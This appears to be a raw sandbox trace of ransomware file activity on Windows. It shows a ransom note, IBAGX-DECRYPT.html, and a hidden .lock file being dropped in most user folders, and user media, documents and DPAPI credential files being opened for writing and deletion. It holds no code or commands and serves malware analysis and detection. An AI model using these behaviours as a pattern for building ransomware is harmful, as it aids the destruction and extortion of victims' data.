Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\CREDHIST desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\7c86938c-9ade-44b2-a1b9-d6e5269c7ffa desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\AppData\Roaming\Microsoft\Protect\S-1-5-21-3149542145-3322839065-4058237693-500\Preferred desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Application Data\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\Default\Application Data\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Contacts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Contacts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Contacts\Administrator.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Cookies\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Cookies\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Documents\My Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Documents\My Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Documents\My Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Documents\My Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Documents\My Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Documents\My Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Downloads\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Downloads\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Favorites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Favorites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Favorites\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Favorites\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Favorites\Links\Web Slice Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Microsoft Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Favorites\Microsoft Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Favorites\Microsoft Websites\IE Add-on site.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Microsoft Websites\IE site on Microsoft.com.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Home.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft At Work.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Microsoft Websites\Microsoft Store.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\MSN Websites\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Favorites\MSN Websites\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Favorites\MSN Websites\MSN Autos.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\MSN Websites\MSN Entertainment.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\MSN Websites\MSN Money.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\MSN Websites\MSN Sports.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\MSN Websites\MSN.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\MSN Websites\MSNBC News.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Windows Live\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Favorites\Windows Live\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Favorites\Windows Live\Get Windows Live.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Windows Live\Windows Live Gallery.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Windows Live\Windows Live Mail.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Favorites\Windows Live\Windows Live Spaces.url desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Links\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Links\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Music\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\Default\Music\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\My Documents\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\Default\My Documents\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\NetHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\NetHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\NTUSER.DAT.LOG1 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.regtrans-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\ntuser.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\Default\Pictures\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\Default\Pictures\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\PrintHood\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\PrintHood\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Recent\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Recent\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Saved Games\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Saved Games\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Searches\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Searches\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Searches\Everywhere.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\Default\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\Default\Searches\Indexed Locations.search-ms desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\Default\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH False 1
Create C:\Users\Default\SendTo\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\SendTo\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Start Menu\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Start Menu\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Templates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\Default\Templates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default\Videos\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\Default\Videos\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\Default User\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Create C:\Users\Default User\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\-vZCBx3T8O8PG8Z7.rtf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\0IDnC0H9EMmV.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\40id.mkv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\41xTLbSy8hho.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\5TbJjRTqQcJAG8oUNN.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\ABdV76mhVKc67XfMG.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Collab\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Collab\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Forms\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Forms\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\addressbook.acrodata desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Acrobat\10.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\AssetCache\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Flash Player\AssetCache\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Headlights\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Headlights\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\Dictionaries\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\Linguistics\Dictionaries\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\LogTransport2\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Adobe\LogTransport2\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\EEBsYm5\AppData\Roaming\Cav7r34AQxz266BdGIX.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\CmR7tOD7XC.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\D1Mcqgb3FDTv-8KryA5.jpg desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Create C:\Users\EEBsYm5\AppData\Roaming\D4hFvv-xbwD80n_k.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
